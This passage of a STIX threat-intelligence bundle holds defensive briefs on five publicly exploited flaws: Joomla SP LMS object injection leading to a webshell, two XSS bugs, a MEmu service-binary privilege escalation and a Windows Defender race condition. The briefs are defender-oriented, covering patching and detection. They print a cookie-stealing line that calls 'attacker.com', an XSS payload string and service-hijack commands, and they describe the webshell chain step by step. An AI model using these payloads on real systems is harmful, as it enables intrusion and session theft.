      "description": "## Overview\n\nA high-severity PHP object injection vulnerability, identified as CVE-2026-48909, has been discovered and publicly exploited in JoomShaper SP LMS versions up to 4.1.3. This vulnerability, affecting a popular Joomla Extension, enables an unauthenticated remote attacker to execute arbitrary code on the underlying server. Exploitation occurs by sending a specially crafted 'lmsOrders' cookie to the `com_splms\u0026view=cart` endpoint. If the main Joomla CMS version is older than 5.2.2, a known gadget chain involving `FormattedtextLogger::__destruct()` can be leveraged to write a webshell to disk, granting the attacker full control over the compromised web server. The availability of a public exploit significantly increases the risk for unpatched systems.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious PHP serialized object payload designed to trigger the object injection gadget chain.\n2.  The attacker carefully base64-encodes this payload, manipulating it to avoid characters (`/`, `+`, `=`) that would be filtered by Joomla's input sanitizer when transmitted in a cookie.\n3.  The attacker sends an HTTP GET request to the `/index.php?option=com_splms\u0026view=cart` endpoint of the vulnerable Joomla instance, including the specially crafted payload within the `lmsOrders` cookie.\n4.  The vulnerable `com_splms` component retrieves the `lmsOrders` cookie, base64-decodes it, and then `unserialize()`s the PHP object.\n5.  During the deserialization process, if the Joomla CMS version is less than 5.2.2, the `FormattedtextLogger::__destruct()` gadget is triggered, calling `File::write()` with attacker-controlled data.\n6.  This action writes an initial PHP loader (containing `hex2bin()` to write the real payload) to a specified, PHP-writable path on the server (e.g., `/tmp/x.php`).\n7.  The attacker then makes a subsequent HTTP GET request to the newly created loader file, causing it to execute and write the full PHP webshell to the same location.\n8.  Finally, the attacker can interact with the deployed webshell by sending commands via URL parameters (e.g., `?c=id`), achieving unauthenticated remote code execution.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-48909 grants unauthenticated remote code execution on the target server. This allows attackers to completely compromise the affected Joomla instance and the underlying server, leading to data exfiltration, website defacement, further network penetration, or the deployment of additional malicious payloads such as ransomware. Organizations running JoomShaper SP LMS versions 4.1.3 or earlier, particularly on Joomla CMS versions prior to 5.2.2, are at severe risk of server compromise and potential business disruption.\n\n## Recommendation\n\n*   **Patch CVE-2026-48909 immediately:** Upgrade JoomShaper SP LMS to version 4.1.4 or higher to remediate the PHP Object injection vulnerability.\n*   **Update Joomla CMS:** Ensure your core Joomla CMS is updated to version 5.2.2 or higher to mitigate the RCE gadget chain, even if the SP LMS extension cannot be immediately patched.\n*   **Deploy the Sigma rule in this brief** to your SIEM and tune for your environment to detect exploitation attempts.\n*   **Enable webserver access logging:** Ensure comprehensive logging of HTTP requests, including full URI paths and cookie headers, to aid in detecting and investigating exploitation attempts.\n",
      "published": "2026-07-06T13:45:49Z",
      "labels": [
        "webapps",
        "php",
        "object-injection",
        "rce",
        "webshell"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52617"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7189fb7-7664-5c8d-96d1-bd53b99029ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--573008d0-3a83-5b37-aa51-4569f8c7e2a3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--573008d0-3a83-5b37-aa51-4569f8c7e2a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "KeepInMind 0.8.4.2 - Stored XSS Public Exploit",
      "description": "## Overview\n\nA publicly available exploit (EDB-52614) has been published on Exploit-DB, detailing a Stored Cross-Site Scripting (XSS) vulnerability in KeepInMind version 0.8.4.2. This vulnerability allows an attacker to inject malicious client-side scripts into web pages that are viewed by other users. When a legitimate user accesses a compromised page, their browser executes the attacker's script, leading to potential session hijacking, data theft, or website defacement. The availability of a working exploit significantly elevates the immediate risk for organizations running unpatched instances of KeepInMind 0.8.4.2. Defenders should prioritize patching this application or implementing strong input sanitization and output encoding to prevent successful exploitation. The exploit's publication date is July 6, 2026, indicating a recent and active threat to systems vulnerable to this specific version.\n\n## Attack Chain\n\n1.  **Malicious Input Insertion**: An attacker sends a crafted HTTP POST request containing a malicious JavaScript payload (e.g., `\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`) to a vulnerable input field (e.g., comment, profile description) within the KeepInMind 0.8.4.2 web application.\n2.  **Server-Side Storage**: The KeepInMind application processes the attacker's input without proper sanitization or encoding, and stores the malicious script directly into its backend database.\n3.  **User Access and Rendering**: A legitimate user's browser later requests a web page from the KeepInMind application that includes the previously stored, attacker-controlled content.\n4.  **Client-Side Script Execution**: The web browser receives the response containing the unsanitized script and executes it within the legitimate user's browser context, often with the same privileges as the application's domain.\n5.  **Data Exfiltration/Action**: The executed script performs an attacker-defined action, such as stealing the victim's session cookies by sending them to an attacker-controlled server (e.g., via `document.location='http://attacker.com/steal?data=' + document.cookie`).\n6.  **Session Hijacking/Further Compromise**: The attacker receives the stolen session cookies and uses them to hijack the victim's authenticated session, gaining unauthorized access to the KeepInMind application with the legitimate user's privileges, or redirects the user to a malicious site.\n\n## Impact\n\nSuccessful exploitation of this Stored XSS vulnerability can lead to severe consequences for affected users and organizations. Attackers can leverage the executed script to steal session tokens, allowing them to hijack authenticated user sessions and gain unauthorized access to the KeepInMind application with the victim's privileges. This can result in data exfiltration, unauthorized modification of content, or even complete account compromise. Furthermore, attackers could inject phishing content, deface web pages, or redirect users to malicious sites, potentially impacting user trust and organizational reputation. While specific victim counts are not available, all users interacting with unpatched KeepInMind 0.8.4.2 installations are at risk.\n\n## Recommendation\n\n*   Upgrade KeepInMind 0.8.4.2 to a patched version as soon as possible to mitigate the Stored XSS vulnerability.\n",
      "published": "2026-07-06T13:34:50Z",
      "labels": [
        "webapps",
        "xss",
        "vulnerability",
        "exploit-db"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52614"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eb688204-417d-5357-87e2-9e05657a0c34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: memuplay.com",
      "pattern": "[domain-name:value = 'memuplay.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:33:45Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d4fef10-92fa-5d18-a800-30b41170a1cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "target_ref": "indicator--eb688204-417d-5357-87e2-9e05657a0c34"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--114f7c11-ccdc-5f27-9260-0685c3d40b46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.memuplay.com/download.html",
      "pattern": "[url:value = 'https://www.memuplay.com/download.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:33:45Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93fe4334-dddc-5efc-b9cc-0451b6e5cef0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "target_ref": "indicator--114f7c11-ccdc-5f27-9260-0685c3d40b46"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f380c5ce-acc9-51a8-8707-d8f02c6cb530",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: C:\\Program Files\\Microvirt\\MEmu\\MemuService.exe",
      "pattern": "[x-ti-bot:file_path = 'C:\\Program Files\\Microvirt\\MEmu\\MemuService.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:33:45Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f616f918-ba0b-5c20-ac2a-1875cead56c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "target_ref": "indicator--f380c5ce-acc9-51a8-8707-d8f02c6cb530"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d050c074-c9ff-589b-a97b-bb35f26f3eb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/sec-zone/Hijack-service-binaries",
      "pattern": "[url:value = 'https://github.com/sec-zone/Hijack-service-binaries']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:33:45Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fab862a2-d9ed-58c8-89aa-171e98aa0863",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "target_ref": "indicator--d050c074-c9ff-589b-a97b-bb35f26f3eb7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--761d9f5a-0ee5-518e-8d33-6baa6ace069b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1e48d5f1-be3d-5597-8629-e45783e86859",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d80f37b5-d5a5-5f59-90f8-27a420be6326",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "MEmu Android Emulator 9.2.7.0 Local Privilege Escalation",
      "description": "## Overview\n\nA critical local privilege escalation (LPE) vulnerability, tracked as CVE-2026-36213, has been identified and publicly disclosed in MEmu Android Emulator version 9.2.7.0. The flaw stems from insecure NTFS permissions applied to the `MemuService.exe` binary, located at `C:\\Program Files\\Microvirt\\MEmu\\MemuService.exe`. This Windows service, named \"MEmuSVC\", operates with `NT AUTHORITY\\SYSTEM` privileges. Due to FullControl permissions granted to low-privileged groups such as `BUILTIN\\Users` and `Everyone` on the service binary, any local user can replace it with a malicious executable. Once replaced, restarting the \"MEmuSVC\" service will trigger the execution of the attacker's code with SYSTEM-level privileges, enabling full system compromise. The availability of a public exploit on Exploit-DB ([EDB-52615](https://www.exploit-db.com/exploits/52615)) significantly increases the urgency for remediation for all users of the affected software.\n\n## Attack Chain\n\n1.  **Initial Access**: A low-privileged attacker gains local access to a Windows system running MEmu Android Emulator 9.2.7.0.\n2.  **Vulnerability Identification**: The attacker identifies the `MEmuSVC` service running with `NT AUTHORITY\\SYSTEM` privileges and its associated binary `C:\\Program Files\\Microvirt\\MEmu\\MemuService.exe`.\n3.  **Permission Check**: The attacker verifies the insecure NTFS permissions on `MemuService.exe` (e.g., using `icacls`), confirming that `BUILTIN\\Users` or `Everyone` have FullControl access.\n4.  **Payload Creation**: The attacker crafts a malicious executable (e.g., `payload.exe`) designed to perform actions like creating a new administrative user or establishing persistence.\n5.  **Binary Replacement**: The attacker exploits the insecure permissions to replace the legitimate `C:\\Program Files\\Microvirt\\MEmu\\MemuService.exe` with their `payload.exe`.\n6.  **Service Control**: The attacker stops the `MEmuSVC` service using `sc stop MEmuSVC`.\n7.  **Privilege Escalation**: The attacker starts the `MEmuSVC` service using `sc start MEmuSVC`, which executes the malicious `payload.exe` with `NT AUTHORITY\\SYSTEM` privileges.\n8.  **Impact**: The malicious payload successfully executes, granting the attacker SYSTEM-level control over the compromised system.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-36213 allows a local attacker to escalate privileges to `NT AUTHORITY\\SYSTEM`, granting complete control over the compromised Windows system. This level of access enables attackers to install malware, modify system configurations, access sensitive data, create new administrative accounts, and potentially move laterally within the network. While the source does not specify victim counts or targeted sectors, any organization or individual using the vulnerable MEmu Android Emulator is at risk of full system compromise if an attacker gains initial local access.\n\n## Recommendation\n\n*   **Patch Immediately**: Update MEmu Android Emulator to a patched version that addresses CVE-2026-36213 as soon as one is available from Microvirt.\n*   **File Integrity Monitoring**: Deploy file integrity monitoring (FIM) on `C:\\Program Files\\Microvirt\\MEmu\\MemuService.exe` to detect unauthorized modifications.\n*   **Endpoint Detection**: Deploy the Sigma rules provided in this brief to your SIEM/EDR to detect attempts to replace the service binary or manipulate the `MEmuSVC` service.\n*   **Sysmon Logging**: Enable Sysmon process creation (Event ID 1) and file creation/modification (Event ID 11) logging to activate the detection rules.\n",
      "published": "2026-07-06T13:33:45Z",
      "labels": [
        "privilege-escalation",
        "windows",
        "emulator",
        "lpe"
      ],
      "object_refs": [
        "indicator--eb688204-417d-5357-87e2-9e05657a0c34",
        "indicator--114f7c11-ccdc-5f27-9260-0685c3d40b46",
        "indicator--f380c5ce-acc9-51a8-8707-d8f02c6cb530",
        "indicator--d050c074-c9ff-589b-a97b-bb35f26f3eb7",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52615"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-36213"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/732.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/sec-zone/Hijack-service-binaries"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fbec4591-b51e-5af7-8eed-87de3afbb13c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: wpzoom.com",
      "pattern": "[domain-name:value = 'wpzoom.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:23:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6049226a-5370-59dd-90ef-bd3c75a3badd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf6ac86d-f98e-58f4-876e-e12b26308fec",
      "target_ref": "indicator--fbec4591-b51e-5af7-8eed-87de3afbb13c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--74d3180f-ed43-558a-b700-25ee487414a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: wordpress.org",
      "pattern": "[domain-name:value = 'wordpress.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:23:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d5b9e6be-355f-5aa5-bc55-48fcfb75ced8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf6ac86d-f98e-58f4-876e-e12b26308fec",
      "target_ref": "indicator--74d3180f-ed43-558a-b700-25ee487414a8"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f521cbd-3c89-5a3b-997c-d4b1d64908b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf6ac86d-f98e-58f4-876e-e12b26308fec",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--52a5e27d-95a7-5d2c-906c-1981da1153fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cf6ac86d-f98e-58f4-876e-e12b26308fec",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cf6ac86d-f98e-58f4-876e-e12b26308fec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WordPress WPZOOM Portfolio Plugin XSS Vulnerability (CVE-2026-49069)",
      "description": "## Overview\n\nA publicly available exploit has been published on Exploit-DB detailing a reflected Cross-Site Scripting (XSS) vulnerability, CVE-2026-49069, affecting the WordPress Plugin WPZOOM Portfolio, specifically versions up to and including 1.4.21. This flaw resides within the `wpzoom_load_more_items` AJAX action, which is accessible to unauthenticated users without proper nonce validation or privilege checks. Attackers can exploit this by crafting a malicious POST request that injects arbitrary JavaScript into the `posts_data` parameter's `class` key. Although `sanitize_text_field()` strips angle brackets, it fails to sanitize single quotes, allowing an attacker to break out of HTML attribute contexts and inject event handlers like `onmouseover`. The presence of a working Proof of Concept (PoC) significantly increases the immediate risk to organizations using vulnerable versions of this plugin.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious HTTP POST request.\n2.  The request targets the `/wp-admin/admin-ajax.php` endpoint on the vulnerable WordPress site.\n3.  The POST request body includes `action=wpzoom_load_more_items` and a `posts_data` parameter containing the XSS payload: `{\"source\":\"post\",\"class\":\"x' onmouseover='alert(document.domain)' y='\"}`.\n4.  The server processes the `wpzoom_load_more_items` AJAX action; `sanitize_text_field()` is applied to `posts_data`, stripping angle brackets but preserving single quotes.\n5.  The attacker-controlled `class` value is subsequently concatenated directly into single-quoted HTML attributes within the `items_html()` function without context-aware output escaping (e.g., `\u003cli class='{$class}_item ...'\u003e`).\n6.  The server's response includes the crafted HTML, such as `\u003cli class='x' onmouseover='alert(document.domain)' y='_item ...'\u003e`, which is then rendered in a victim's browser.\n7.  When a victim's browser renders the affected page and the victim interacts with the vulnerable element (e.g., hovering over the loaded portfolio item), the injected `onmouseover` JavaScript event handler executes.\n8.  The attacker achieves client-side script execution, potentially leading to session hijacking, defacement, or redirection to malicious sites.\n\n## Impact\n\nThe successful exploitation of CVE-2026-49069 can lead to various client-side attacks, including session hijacking, defacement of the affected WordPress site, redirection of users to malicious websites, or the delivery of further malware. Since the vulnerability is unauthenticated and widely affects WordPress installations using the WPZOOM Portfolio plugin up to version 1.4.21, any user browsing the compromised site could become a victim. Organizations using this plugin could face reputation damage, data breaches, and significant operational disruption if their sites are exploited.\n\n## Recommendation\n\n*   **Patch immediately:** Upgrade the WPZOOM Portfolio plugin to a version greater than 1.4.21 to remediate CVE-2026-49069.\n*   **Deploy the Sigma rule:** Deploy the `Detect WordPress WPZOOM Portfolio XSS Exploitation (CVE-2026-49069)` Sigma rule provided in this brief to your SIEM and tune for your environment to detect exploitation attempts.\n*   **Monitor web server logs:** Regularly review web server access logs for suspicious POST requests to `/wp-admin/admin-ajax.php` containing unusual `posts_data` parameters, as outlined in the provided IOCs.\n",
      "published": "2026-07-06T13:23:23Z",
      "labels": [
        "xss",
        "wordpress",
        "webapps",
        "cve"
      ],
      "object_refs": [
        "indicator--fbec4591-b51e-5af7-8eed-87de3afbb13c",
        "indicator--74d3180f-ed43-558a-b700-25ee487414a8",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52611"
        },
        {
          "source_name": "reference",
          "url": "https://wpzoom.com"
        },
        {
          "source_name": "reference",
          "url": "https://wordpress.org"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--007a5a19-25a7-5782-b5ad-59b8bf2c94a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://gitlab.com/nu11secur1ty/0.git",
      "pattern": "[url:value = 'https://gitlab.com/nu11secur1ty/0.git']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:22:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7c97ab2b-592b-5813-abf8-12b6b42e097d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a4059a0a-3a7a-5f29-811a-fd5f6dd4b288",
      "target_ref": "indicator--007a5a19-25a7-5782-b5ad-59b8bf2c94a2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f7c1f9a5-45e2-562d-9105-20f2d69b06fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://gitlab.com/nu11secur1ty/0/-/raw/main/README.md?ref_type=heads",
      "pattern": "[url:value = 'https://gitlab.com/nu11secur1ty/0/-/raw/main/README.md?ref_type=heads']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:22:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--99a4a6a3-4982-5934-afbb-5384466b9b98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a4059a0a-3a7a-5f29-811a-fd5f6dd4b288",
      "target_ref": "indicator--f7c1f9a5-45e2-562d-9105-20f2d69b06fa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a11068c1-5247-51cd-a818-04250e30f224",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.patreon.com/nu11secur1ty/posts/honda-exploit-160798929",
      "pattern": "[url:value = 'https://www.patreon.com/nu11secur1ty/posts/honda-exploit-160798929']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T13:22:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36f14109-ad59-56fc-bd63-f9c73d84b548",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a4059a0a-3a7a-5f29-811a-fd5f6dd4b288",
      "target_ref": "indicator--a11068c1-5247-51cd-a818-04250e30f224"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1a84c9ec-1974-5214-ae4d-3354cf418f35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a4059a0a-3a7a-5f29-811a-fd5f6dd4b288",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a4059a0a-3a7a-5f29-811a-fd5f6dd4b288",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Defender Race Condition (EDB-52612) Leads to Local Privilege Escalation and AV Bypass",
      "description": "## Overview\n\nA critical local race condition vulnerability (EDB-52612) affecting Microsoft Windows Defender's scanning engine (MsMpEng.exe) has been publicly disclosed on Exploit-DB. Published by nu11secur1ty on July 6, 2026, this flaw exists between Defender's cleanup routine (`MpCleanCallbackFunction`) and Volume Shadow Copy creation. Successful exploitation, demonstrated by a public Proof-of-Concept, grants local privilege escalation (LPE) to `NT AUTHORITY\\SYSTEM` via `CreateProcessAsUser` and can trigger a use-after-free condition, causing MsMpEng.exe to crash. This not only elevates attacker privileges but also leaves the compromised system temporarily without antivirus protection. The availability of a working exploit elevates the immediate risk for organizations running unpatched Windows systems, requiring immediate attention from defenders.\n\n## Attack Chain\n\n1.  An attacker gains initial local access to a vulnerable Windows system, typically through other means (e.g., social engineering, exploiting a user-level application vulnerability).\n2.  The attacker executes a malicious process that leverages Windows API calls like `OpenVirtualDisk` and `AttachVirtualDisk` to mount a fake ISO image.\n3.  The malicious process elevates its own or specific thread priorities to `REALTIME_PRIORITY_CLASS` and `THREAD_PRIORITY_TIME_CRITICAL` to enhance its ability to win race conditions.\n4.  The attacker initiates operations designed to trigger a race condition between Windows Defender's `MpCleanCallbackFunction` (cleanup routine) and the system's Volume Shadow Copy creation.\n5.  During the race, the attacker manipulates file system operations to substitute or plant malicious files in a location Defender is processing for cleanup.\n6.  The vulnerability allows the malicious process to execute code or manipulate system services using `CreateProcessAsUser` with `NT AUTHORITY\\SYSTEM` privileges.\n7.  The system process `MsMpEng.exe` experiences a use-after-free condition and crashes, leaving the system temporarily without active antivirus protection.\n8.  The attacker maintains `NT AUTHORITY\\SYSTEM` privileges, enabling full control over the compromised system, persistence, and further malicious activities without AV detection.\n\n## Impact\n\nA successful exploitation of this race condition results in an attacker achieving `NT AUTHORITY\\SYSTEM` privileges on the compromised Windows host. This complete control allows for arbitrary code execution, data exfiltration, deployment of further malware, and establishment of persistence. Additionally, the exploit can cause the `MsMpEng.exe` process to crash due to a use-after-free condition, temporarily disabling Windows Defender's real-time protection and leaving the system vulnerable to subsequent attacks without immediate antivirus safeguards.\n\n## Recommendation\n\n*   Apply the official Microsoft security update as soon as it becomes available to patch the race condition vulnerability (EDB-52612) in Windows Defender (MsMpEng.exe).\n*   Implement advanced API monitoring on endpoints for suspicious calls to `OpenVirtualDisk` or `AttachVirtualDisk` from non-system processes, particularly when observed alongside rapid process priority changes, to potentially identify exploitation attempts.\n*   Focus endpoint detection on `CreateProcessAsUser` calls where the resulting process runs as `NT AUTHORITY\\SYSTEM` but is spawned by an unusual parent process or exhibits suspicious command-line arguments.\n*   Configure monitoring for crashes of `MsMpEng.exe` (e.g., via event logs) that are not attributed to legitimate system reconfigurations or updates, as this could indicate a successful use-after-free exploitation.\n",
      "published": "2026-07-06T13:22:21Z",
      "labels": [
        "local-privilege-escalation",
        "race-condition",
        "windows-defender",
        "exploit-db",
        "vulnerability",
        "endpoint"
      ],
      "object_refs": [
        "indicator--007a5a19-25a7-5782-b5ad-59b8bf2c94a2",
        "indicator--f7c1f9a5-45e2-562d-9105-20f2d69b06fa",
        "indicator--a11068c1-5247-51cd-a818-04250e30f224",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52612"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.com/nu11secur1ty/0/-/raw/main/README.md?ref_type=heads"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
